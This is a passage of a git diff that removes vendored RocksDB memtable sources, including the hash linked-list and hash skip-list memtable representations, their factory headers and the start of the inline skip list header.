-      auto* bucket = memtable_rep_.GetBucket(transformed);
-
-      SkipListBucketHeader* skip_list_header =
-          memtable_rep_.GetSkipListBucketHeader(bucket);
-      if (skip_list_header != nullptr) {
-        // The bucket is organized as a skip list
-        if (!skip_list_iter_) {
-          skip_list_iter_.reset(
-              new MemtableSkipList::Iterator(&skip_list_header->skip_list));
-        } else {
-          skip_list_iter_->SetList(&skip_list_header->skip_list);
-        }
-        if (memtable_key != nullptr) {
-          skip_list_iter_->Seek(memtable_key);
-        } else {
-          IterKey encoded_key;
-          encoded_key.EncodeLengthPrefixedKey(k);
-          skip_list_iter_->Seek(encoded_key.GetUserKey().data());
-        }
-      } else {
-        // The bucket is organized as a linked list
-        skip_list_iter_.reset();
-        Reset(memtable_rep_.GetLinkListFirstNode(bucket));
-        HashLinkListRep::LinkListIterator::Seek(k, memtable_key);
-      }
-    }
-
-    virtual bool Valid() const override {
-      if (skip_list_iter_) {
-        return skip_list_iter_->Valid();
-      }
-      return HashLinkListRep::LinkListIterator::Valid();
-    }
-
-    virtual const char* key() const override {
-      if (skip_list_iter_) {
-        return skip_list_iter_->key();
-      }
-      return HashLinkListRep::LinkListIterator::key();
-    }
-
-    virtual void Next() override {
-      if (skip_list_iter_) {
-        skip_list_iter_->Next();
-      } else {
-        HashLinkListRep::LinkListIterator::Next();
-      }
-    }
-
-   private:
-    // the underlying memtable
-    const HashLinkListRep& memtable_rep_;
-    std::unique_ptr<MemtableSkipList::Iterator> skip_list_iter_;
-  };
-
-  class EmptyIterator : public MemTableRep::Iterator {
-    // This is used when there wasn't a bucket. It is cheaper than
-    // instantiating an empty bucket over which to iterate.
-   public:
-    EmptyIterator() { }
-    virtual bool Valid() const override { return false; }
-    virtual const char* key() const override {
-      assert(false);
-      return nullptr;
-    }
-    virtual void Next() override {}
-    virtual void Prev() override {}
-    virtual void Seek(const Slice& user_key,
-                      const char* memtable_key) override {}
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override {}
-    virtual void SeekToFirst() override {}
-    virtual void SeekToLast() override {}
-
-   private:
-  };
-};
-
-HashLinkListRep::HashLinkListRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, size_t bucket_size,
-    uint32_t threshold_use_skiplist, size_t huge_page_tlb_size, Logger* logger,
-    int bucket_entries_logging_threshold, bool if_log_bucket_dist_when_flash)
-    : MemTableRep(allocator),
-      bucket_size_(bucket_size),
-      // Threshold to use skip list doesn't make sense if less than 3, so we
-      // force it to be minimum of 3 to simplify implementation.
-      threshold_use_skiplist_(std::max(threshold_use_skiplist, 3U)),
-      transform_(transform),
-      compare_(compare),
-      logger_(logger),
-      bucket_entries_logging_threshold_(bucket_entries_logging_threshold),
-      if_log_bucket_dist_when_flash_(if_log_bucket_dist_when_flash) {
-  char* mem = allocator_->AllocateAligned(sizeof(Pointer) * bucket_size,
-                                      huge_page_tlb_size, logger);
-
-  buckets_ = new (mem) Pointer[bucket_size];
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    buckets_[i].store(nullptr, std::memory_order_relaxed);
-  }
-}
-
-HashLinkListRep::~HashLinkListRep() {
-}
-
-KeyHandle HashLinkListRep::Allocate(const size_t len, char** buf) {
-  char* mem = allocator_->AllocateAligned(sizeof(Node) + len);
-  Node* x = new (mem) Node();
-  *buf = x->key;
-  return static_cast<void*>(x);
-}
-
-SkipListBucketHeader* HashLinkListRep::GetSkipListBucketHeader(
-    Pointer* first_next_pointer) const {
-  if (first_next_pointer == nullptr) {
-    return nullptr;
-  }
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Single entry bucket
-    return nullptr;
-  }
-  // Counting header
-  BucketHeader* header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-  if (header->IsSkipListBucket()) {
-    assert(header->GetNumEntries() > threshold_use_skiplist_);
-    auto* skip_list_bucket_header =
-        reinterpret_cast<SkipListBucketHeader*>(header);
-    assert(skip_list_bucket_header->Counting_header.next.load(
-               std::memory_order_relaxed) == header);
-    return skip_list_bucket_header;
-  }
-  assert(header->GetNumEntries() <= threshold_use_skiplist_);
-  return nullptr;
-}
-
-Node* HashLinkListRep::GetLinkListFirstNode(Pointer* first_next_pointer) const {
-  if (first_next_pointer == nullptr) {
-    return nullptr;
-  }
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Single entry bucket
-    return reinterpret_cast<Node*>(first_next_pointer);
-  }
-  // Counting header
-  BucketHeader* header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-  if (!header->IsSkipListBucket()) {
-    assert(header->GetNumEntries() <= threshold_use_skiplist_);
-    return reinterpret_cast<Node*>(
-        header->next.load(std::memory_order_acquire));
-  }
-  assert(header->GetNumEntries() > threshold_use_skiplist_);
-  return nullptr;
-}
-
-void HashLinkListRep::Insert(KeyHandle handle) {
-  Node* x = static_cast<Node*>(handle);
-  assert(!Contains(x->key));
-  Slice internal_key = GetLengthPrefixedSlice(x->key);
-  auto transformed = GetPrefix(internal_key);
-  auto& bucket = buckets_[GetHash(transformed)];
-  Pointer* first_next_pointer =
-      static_cast<Pointer*>(bucket.load(std::memory_order_relaxed));
-
-  if (first_next_pointer == nullptr) {
-    // Case 1. empty bucket
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(nullptr);
-    bucket.store(x, std::memory_order_release);
-    return;
-  }
-
-  BucketHeader* header = nullptr;
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Case 2. only one entry in the bucket
-    // Need to convert to a Counting bucket and turn to case 4.
-    Node* first = reinterpret_cast<Node*>(first_next_pointer);
-    // Need to add a bucket header.
-    // We have to first convert it to a bucket with header before inserting
-    // the new node. Otherwise, we might need to change next pointer of first.
-    // In that case, a reader might sees the next pointer is NULL and wrongly
-    // think the node is a bucket header.
-    auto* mem = allocator_->AllocateAligned(sizeof(BucketHeader));
-    header = new (mem) BucketHeader(first, 1);
-    bucket.store(header, std::memory_order_release);
-  } else {
-    header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-    if (header->IsSkipListBucket()) {
-      // Case 4. Bucket is already a skip list
-      assert(header->GetNumEntries() > threshold_use_skiplist_);
-      auto* skip_list_bucket_header =
-          reinterpret_cast<SkipListBucketHeader*>(header);
-      // Only one thread can execute Insert() at one time. No need to do atomic
-      // incremental.
-      skip_list_bucket_header->Counting_header.IncNumEntries();
-      skip_list_bucket_header->skip_list.Insert(x->key);
-      return;
-    }
-  }
-
-  if (bucket_entries_logging_threshold_ > 0 &&
-      header->GetNumEntries() ==
-          static_cast<uint32_t>(bucket_entries_logging_threshold_)) {
-    Info(logger_, "HashLinkedList bucket %" ROCKSDB_PRIszt
-                  " has more than %d "
-                  "entries. Key to insert: %s",
-         GetHash(transformed), header->GetNumEntries(),
-         GetLengthPrefixedSlice(x->key).ToString(true).c_str());
-  }
-
-  if (header->GetNumEntries() == threshold_use_skiplist_) {
-    // Case 3. number of entries reaches the threshold so need to convert to
-    // skip list.
-    LinkListIterator bucket_iter(
-        this, reinterpret_cast<Node*>(
-                  first_next_pointer->load(std::memory_order_relaxed)));
-    auto mem = allocator_->AllocateAligned(sizeof(SkipListBucketHeader));
-    SkipListBucketHeader* new_skip_list_header = new (mem)
-        SkipListBucketHeader(compare_, allocator_, header->GetNumEntries() + 1);
-    auto& skip_list = new_skip_list_header->skip_list;
-
-    // Add all current entries to the skip list
-    for (bucket_iter.SeekToHead(); bucket_iter.Valid(); bucket_iter.Next()) {
-      skip_list.Insert(bucket_iter.key());
-    }
-
-    // insert the new entry
-    skip_list.Insert(x->key);
-    // Set the bucket
-    bucket.store(new_skip_list_header, std::memory_order_release);
-  } else {
-    // Case 5. Need to insert to the sorted linked list without changing the
-    // header.
-    Node* first =
-        reinterpret_cast<Node*>(header->next.load(std::memory_order_relaxed));
-    assert(first != nullptr);
-    // Advance counter unless the bucket needs to be advanced to skip list.
-    // In that case, we need to make sure the previous count never exceeds
-    // threshold_use_skiplist_ to avoid readers to cast to wrong format.
-    header->IncNumEntries();
-
-    Node* cur = first;
-    Node* prev = nullptr;
-    while (true) {
-      if (cur == nullptr) {
-        break;
-      }
-      Node* next = cur->Next();
-      // Make sure the lists are sorted.
-      // If x points to head_ or next points nullptr, it is trivially satisfied.
-      assert((cur == first) || (next == nullptr) ||
-             KeyIsAfterNode(next->key, cur));
-      if (KeyIsAfterNode(internal_key, cur)) {
-        // Keep searching in this list
-        prev = cur;
-        cur = next;
-      } else {
-        break;
-      }
-    }
-
-    // Our data structure does not allow duplicate insertion
-    assert(cur == nullptr || !Equal(x->key, cur->key));
-
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(cur);
-
-    if (prev) {
-      prev->SetNext(x);
-    } else {
-      header->next.store(static_cast<void*>(x), std::memory_order_release);
-    }
-  }
-}
-
-bool HashLinkListRep::Contains(const char* key) const {
-  Slice internal_key = GetLengthPrefixedSlice(key);
-
-  auto transformed = GetPrefix(internal_key);
-  auto bucket = GetBucket(transformed);
-  if (bucket == nullptr) {
-    return false;
-  }
-
-  SkipListBucketHeader* skip_list_header = GetSkipListBucketHeader(bucket);
-  if (skip_list_header != nullptr) {
-    return skip_list_header->skip_list.Contains(key);
-  } else {
-    return LinkListContains(GetLinkListFirstNode(bucket), internal_key);
-  }
-}
-
-size_t HashLinkListRep::ApproximateMemoryUsage() {
-  // Memory is always allocated from the allocator.
-  return 0;
-}
-
-void HashLinkListRep::Get(const LookupKey& k, void* callback_args,
-                          bool (*callback_func)(void* arg, const char* entry)) {
-  auto transformed = transform_->Transform(k.user_key());
-  auto bucket = GetBucket(transformed);
-
-  auto* skip_list_header = GetSkipListBucketHeader(bucket);
-  if (skip_list_header != nullptr) {
-    // Is a skip list
-    MemtableSkipList::Iterator iter(&skip_list_header->skip_list);
-    for (iter.Seek(k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  } else {
-    auto* link_list_head = GetLinkListFirstNode(bucket);
-    if (link_list_head != nullptr) {
-      LinkListIterator iter(this, link_list_head);
-      for (iter.Seek(k.internal_key(), nullptr);
-           iter.Valid() && callback_func(callback_args, iter.key());
-           iter.Next()) {
-      }
-    }
-  }
-}
-
-MemTableRep::Iterator* HashLinkListRep::GetIterator(Arena* alloc_arena) {
-  // allocate a new arena of similar size to the one currently in use
-  Arena* new_arena = new Arena(allocator_->BlockSize());
-  auto list = new MemtableSkipList(compare_, new_arena);
-  HistogramImpl keys_per_bucket_hist;
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    int count = 0;
-    auto* bucket = GetBucket(i);
-    if (bucket != nullptr) {
-      auto* skip_list_header = GetSkipListBucketHeader(bucket);
-      if (skip_list_header != nullptr) {
-        // Is a skip list
-        MemtableSkipList::Iterator itr(&skip_list_header->skip_list);
-        for (itr.SeekToFirst(); itr.Valid(); itr.Next()) {
-          list->Insert(itr.key());
-          count++;
-        }
-      } else {
-        auto* link_list_head = GetLinkListFirstNode(bucket);
-        if (link_list_head != nullptr) {
-          LinkListIterator itr(this, link_list_head);
-          for (itr.SeekToHead(); itr.Valid(); itr.Next()) {
-            list->Insert(itr.key());
-            count++;
-          }
-        }
-      }
-    }
-    if (if_log_bucket_dist_when_flash_) {
-      keys_per_bucket_hist.Add(count);
-    }
-  }
-  if (if_log_bucket_dist_when_flash_ && logger_ != nullptr) {
-    Info(logger_, "hashLinkedList Entry distribution among buckets: %s",
-         keys_per_bucket_hist.ToString().c_str());
-  }
-
-  if (alloc_arena == nullptr) {
-    return new FullListIterator(list, new_arena);
-  } else {
-    auto mem = alloc_arena->AllocateAligned(sizeof(FullListIterator));
-    return new (mem) FullListIterator(list, new_arena);
-  }
-}
-
-MemTableRep::Iterator* HashLinkListRep::GetDynamicPrefixIterator(
-    Arena* alloc_arena) {
-  if (alloc_arena == nullptr) {
-    return new DynamicIterator(*this);
-  } else {
-    auto mem = alloc_arena->AllocateAligned(sizeof(DynamicIterator));
-    return new (mem) DynamicIterator(*this);
-  }
-}
-
-bool HashLinkListRep::LinkListContains(Node* head,
-                                       const Slice& user_key) const {
-  Node* x = FindGreaterOrEqualInBucket(head, user_key);
-  return (x != nullptr && Equal(user_key, x->key));
-}
-
-Node* HashLinkListRep::FindGreaterOrEqualInBucket(Node* head,
-                                                  const Slice& key) const {
-  Node* x = head;
-  while (true) {
-    if (x == nullptr) {
-      return x;
-    }
-    Node* next = x->Next();
-    // Make sure the lists are sorted.
-    // If x points to head_ or next points nullptr, it is trivially satisfied.
-    assert((x == head) || (next == nullptr) || KeyIsAfterNode(next->key, x));
-    if (KeyIsAfterNode(key, x)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      break;
-    }
-  }
-  return x;
-}
-
-} // anon namespace
-
-MemTableRep* HashLinkListRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new HashLinkListRep(compare, allocator, transform, bucket_count_,
-                             threshold_use_skiplist_, huge_page_tlb_size_,
-                             logger, bucket_entries_logging_threshold_,
-                             if_log_bucket_dist_when_flash_);
-}
-
-MemTableRepFactory* NewHashLinkListRepFactory(
-    size_t bucket_count, size_t huge_page_tlb_size,
-    int bucket_entries_logging_threshold, bool if_log_bucket_dist_when_flash,
-    uint32_t threshold_use_skiplist) {
-  return new HashLinkListRepFactory(
-      bucket_count, threshold_use_skiplist, huge_page_tlb_size,
-      bucket_entries_logging_threshold, if_log_bucket_dist_when_flash);
-}
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_linklist_rep.h b/thirdparty/rocksdb/memtable/hash_linklist_rep.h
deleted file mode 100644
index a6da3ee..0000000
--- a/thirdparty/rocksdb/memtable/hash_linklist_rep.h
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashLinkListRepFactory : public MemTableRepFactory {
- public:
-  explicit HashLinkListRepFactory(size_t bucket_count,
-                                  uint32_t threshold_use_skiplist,
-                                  size_t huge_page_tlb_size,
-                                  int bucket_entries_logging_threshold,
-                                  bool if_log_bucket_dist_when_flash)
-      : bucket_count_(bucket_count),
-        threshold_use_skiplist_(threshold_use_skiplist),
-        huge_page_tlb_size_(huge_page_tlb_size),
-        bucket_entries_logging_threshold_(bucket_entries_logging_threshold),
-        if_log_bucket_dist_when_flash_(if_log_bucket_dist_when_flash) {}
-
-  virtual ~HashLinkListRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "HashLinkListRepFactory";
-  }
-
- private:
-  const size_t bucket_count_;
-  const uint32_t threshold_use_skiplist_;
-  const size_t huge_page_tlb_size_;
-  int bucket_entries_logging_threshold_;
-  bool if_log_bucket_dist_when_flash_;
-};
-
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc b/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc
deleted file mode 100644
index e34743e..0000000
--- a/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc
+++ /dev/null
@@ -1,351 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_skiplist_rep.h"
-
-#include <atomic>
-
-#include "rocksdb/memtablerep.h"
-#include "util/arena.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "port/port.h"
-#include "util/murmurhash.h"
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-
-namespace rocksdb {
-namespace {
-
-class HashSkipListRep : public MemTableRep {
- public:
-  HashSkipListRep(const MemTableRep::KeyComparator& compare,
-                  Allocator* allocator, const SliceTransform* transform,
-                  size_t bucket_size, int32_t skiplist_height,
-                  int32_t skiplist_branching_factor);
-
-  virtual void Insert(KeyHandle handle) override;
-
-  virtual bool Contains(const char* key) const override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~HashSkipListRep();
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override;
-
-  virtual MemTableRep::Iterator* GetDynamicPrefixIterator(
-      Arena* arena = nullptr) override;
-
- private:
-  friend class DynamicIterator;
-  typedef SkipList<const char*, const MemTableRep::KeyComparator&> Bucket;
-
-  size_t bucket_size_;
-
-  const int32_t skiplist_height_;
-  const int32_t skiplist_branching_factor_;
-
-  // Maps slices (which are transformed user keys) to buckets of keys sharing
-  // the same transform.
-  std::atomic<Bucket*>* buckets_;
-
-  // The user-supplied transform whose domain is the user keys.
-  const SliceTransform* transform_;
-
-  const MemTableRep::KeyComparator& compare_;
-  // immutable after construction
-  Allocator* const allocator_;
-
-  inline size_t GetHash(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0) %
-           bucket_size_;
-  }
-  inline Bucket* GetBucket(size_t i) const {
-    return buckets_[i].load(std::memory_order_acquire);
-  }
-  inline Bucket* GetBucket(const Slice& slice) const {
-    return GetBucket(GetHash(slice));
-  }
-  // Get a bucket from buckets_. If the bucket hasn't been initialized yet,
-  // initialize it before returning.
-  Bucket* GetInitializedBucket(const Slice& transformed);
-
-  class Iterator : public MemTableRep::Iterator {
-   public:
-    explicit Iterator(Bucket* list, bool own_list = true,
-                      Arena* arena = nullptr)
-        : list_(list), iter_(list), own_list_(own_list), arena_(arena) {}
-
-    virtual ~Iterator() {
-      // if we own the list, we should also delete it
-      if (own_list_) {
-        assert(list_ != nullptr);
-        delete list_;
-      }
-    }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override {
-      return list_ != nullptr && iter_.Valid();
-    }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      if (list_ != nullptr) {
-        const char* encoded_key =
-            (memtable_key != nullptr) ?
-                memtable_key : EncodeKey(&tmp_, internal_key);
-        iter_.Seek(encoded_key);
-      }
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      // not supported
-      assert(false);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      if (list_ != nullptr) {
-        iter_.SeekToFirst();
-      }
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      if (list_ != nullptr) {
-        iter_.SeekToLast();
-      }
-    }
-   protected:
-    void Reset(Bucket* list) {
-      if (own_list_) {
-        assert(list_ != nullptr);
-        delete list_;
-      }
-      list_ = list;
-      iter_.SetList(list);
-      own_list_ = false;
-    }
-   private:
-    // if list_ is nullptr, we should NEVER call any methods on iter_
-    // if list_ is nullptr, this Iterator is not Valid()
-    Bucket* list_;
-    Bucket::Iterator iter_;
-    // here we track if we own list_. If we own it, we are also
-    // responsible for it's cleaning. This is a poor man's shared_ptr
-    bool own_list_;
-    std::unique_ptr<Arena> arena_;
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  class DynamicIterator : public HashSkipListRep::Iterator {
-   public:
-    explicit DynamicIterator(const HashSkipListRep& memtable_rep)
-      : HashSkipListRep::Iterator(nullptr, false),
-        memtable_rep_(memtable_rep) {}
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& k, const char* memtable_key) override {
-      auto transformed = memtable_rep_.transform_->Transform(ExtractUserKey(k));
-      Reset(memtable_rep_.GetBucket(transformed));
-      HashSkipListRep::Iterator::Seek(k, memtable_key);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-   private:
-    // the underlying memtable
-    const HashSkipListRep& memtable_rep_;
-  };
-
-  class EmptyIterator : public MemTableRep::Iterator {
-    // This is used when there wasn't a bucket. It is cheaper than
-    // instantiating an empty bucket over which to iterate.
-   public:
-    EmptyIterator() { }
-    virtual bool Valid() const override { return false; }
-    virtual const char* key() const override {
-      assert(false);
-      return nullptr;
-    }
-    virtual void Next() override {}
-    virtual void Prev() override {}
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {}
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {}
-    virtual void SeekToFirst() override {}
-    virtual void SeekToLast() override {}
-
-   private:
-  };
-};
-
-HashSkipListRep::HashSkipListRep(const MemTableRep::KeyComparator& compare,
-                                 Allocator* allocator,
-                                 const SliceTransform* transform,
-                                 size_t bucket_size, int32_t skiplist_height,
-                                 int32_t skiplist_branching_factor)
-    : MemTableRep(allocator),
-      bucket_size_(bucket_size),
-      skiplist_height_(skiplist_height),
-      skiplist_branching_factor_(skiplist_branching_factor),
-      transform_(transform),
-      compare_(compare),
-      allocator_(allocator) {
-  auto mem = allocator->AllocateAligned(
-               sizeof(std::atomic<void*>) * bucket_size);
-  buckets_ = new (mem) std::atomic<Bucket*>[bucket_size];
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    buckets_[i].store(nullptr, std::memory_order_relaxed);
-  }
-}
-
-HashSkipListRep::~HashSkipListRep() {
-}
-
-HashSkipListRep::Bucket* HashSkipListRep::GetInitializedBucket(
-    const Slice& transformed) {
-  size_t hash = GetHash(transformed);
-  auto bucket = GetBucket(hash);
-  if (bucket == nullptr) {
-    auto addr = allocator_->AllocateAligned(sizeof(Bucket));
-    bucket = new (addr) Bucket(compare_, allocator_, skiplist_height_,
-                               skiplist_branching_factor_);
-    buckets_[hash].store(bucket, std::memory_order_release);
-  }
-  return bucket;
-}
-
-void HashSkipListRep::Insert(KeyHandle handle) {
-  auto* key = static_cast<char*>(handle);
-  assert(!Contains(key));
-  auto transformed = transform_->Transform(UserKey(key));
-  auto bucket = GetInitializedBucket(transformed);
-  bucket->Insert(key);
-}
-
-bool HashSkipListRep::Contains(const char* key) const {
-  auto transformed = transform_->Transform(UserKey(key));
-  auto bucket = GetBucket(transformed);
-  if (bucket == nullptr) {
-    return false;
-  }
-  return bucket->Contains(key);
-}
-
-size_t HashSkipListRep::ApproximateMemoryUsage() {
-  return 0;
-}
-
-void HashSkipListRep::Get(const LookupKey& k, void* callback_args,
-                          bool (*callback_func)(void* arg, const char* entry)) {
-  auto transformed = transform_->Transform(k.user_key());
-  auto bucket = GetBucket(transformed);
-  if (bucket != nullptr) {
-    Bucket::Iterator iter(bucket);
-    for (iter.Seek(k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  }
-}
-
-MemTableRep::Iterator* HashSkipListRep::GetIterator(Arena* arena) {
-  // allocate a new arena of similar size to the one currently in use
-  Arena* new_arena = new Arena(allocator_->BlockSize());
-  auto list = new Bucket(compare_, new_arena);
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    auto bucket = GetBucket(i);
-    if (bucket != nullptr) {
-      Bucket::Iterator itr(bucket);
-      for (itr.SeekToFirst(); itr.Valid(); itr.Next()) {
-        list->Insert(itr.key());
-      }
-    }
-  }
-  if (arena == nullptr) {
-    return new Iterator(list, true, new_arena);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(Iterator));
-    return new (mem) Iterator(list, true, new_arena);
-  }
-}
-
-MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) {
-  if (arena == nullptr) {
-    return new DynamicIterator(*this);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(DynamicIterator));
-    return new (mem) DynamicIterator(*this);
-  }
-}
-
-} // anon namespace
-
-MemTableRep* HashSkipListRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new HashSkipListRep(compare, allocator, transform, bucket_count_,
-                             skiplist_height_, skiplist_branching_factor_);
-}
-
-MemTableRepFactory* NewHashSkipListRepFactory(
-    size_t bucket_count, int32_t skiplist_height,
-    int32_t skiplist_branching_factor) {
-  return new HashSkipListRepFactory(bucket_count, skiplist_height,
-      skiplist_branching_factor);
-}
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_skiplist_rep.h b/thirdparty/rocksdb/memtable/hash_skiplist_rep.h
deleted file mode 100644
index 5d1e04f..0000000
--- a/thirdparty/rocksdb/memtable/hash_skiplist_rep.h
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashSkipListRepFactory : public MemTableRepFactory {
- public:
-  explicit HashSkipListRepFactory(
-    size_t bucket_count,
-    int32_t skiplist_height,
-    int32_t skiplist_branching_factor)
-      : bucket_count_(bucket_count),
-        skiplist_height_(skiplist_height),
-        skiplist_branching_factor_(skiplist_branching_factor) { }
-
-  virtual ~HashSkipListRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "HashSkipListRepFactory";
-  }
-
- private:
-  const size_t bucket_count_;
-  const int32_t skiplist_height_;
-  const int32_t skiplist_branching_factor_;
-};
-
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/inlineskiplist.h b/thirdparty/rocksdb/memtable/inlineskiplist.h
deleted file mode 100644
index 5cf6c57..0000000
--- a/thirdparty/rocksdb/memtable/inlineskiplist.h
+++ /dev/null
@@ -1,899 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.  Use of
-// this source code is governed by a BSD-style license that can be found
-// in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// InlineSkipList is derived from SkipList (skiplist.h), but it optimizes
-// the memory layout by requiring that the key storage be allocated through
-// the skip list instance.  For the common case of SkipList<const char*,
-// Cmp> this saves 1 pointer per skip list node and gives better cache
-// locality, at the expense of wasted padding from using AllocateAligned
-// instead of Allocate for the keys.  The unused padding will be from
-// 0 to sizeof(void*)-1 bytes, and the space savings are sizeof(void*)
-// bytes, so despite the padding the space used is always less than
-// SkipList<const char*, ..>.
-//
-// Thread safety -------------
-//
-// Writes via Insert require external synchronization, most likely a mutex.
-// InsertConcurrently can be safely called concurrently with reads and
-// with other concurrent inserts.  Reads require a guarantee that the
-// InlineSkipList will not be destroyed while the read is in progress.
-// Apart from that, reads progress without any internal locking or
-// synchronization.
-//
-// Invariants:
-//
-// (1) Allocated nodes are never deleted until the InlineSkipList is
-// destroyed.  This is trivially guaranteed by the code since we never
-// delete any skip list nodes.
-//
-// (2) The contents of a Node except for the next/prev pointers are
-// immutable after the Node has been linked into the InlineSkipList.
-// Only Insert() modifies the list, and it is careful to initialize a
-// node and use release-stores to publish the nodes in one or more lists.
-//
-// ... prev vs. next pointer ordering ...
-//
-
-#pragma once
-#include <assert.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <atomic>
-#include "port/port.h"
-#include "util/allocator.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-template <class Comparator>
-class InlineSkipList {
- private:
-  struct Node;
-  struct Splice;
-
- public:
-  static const uint16_t kMaxPossibleHeight = 32;
-
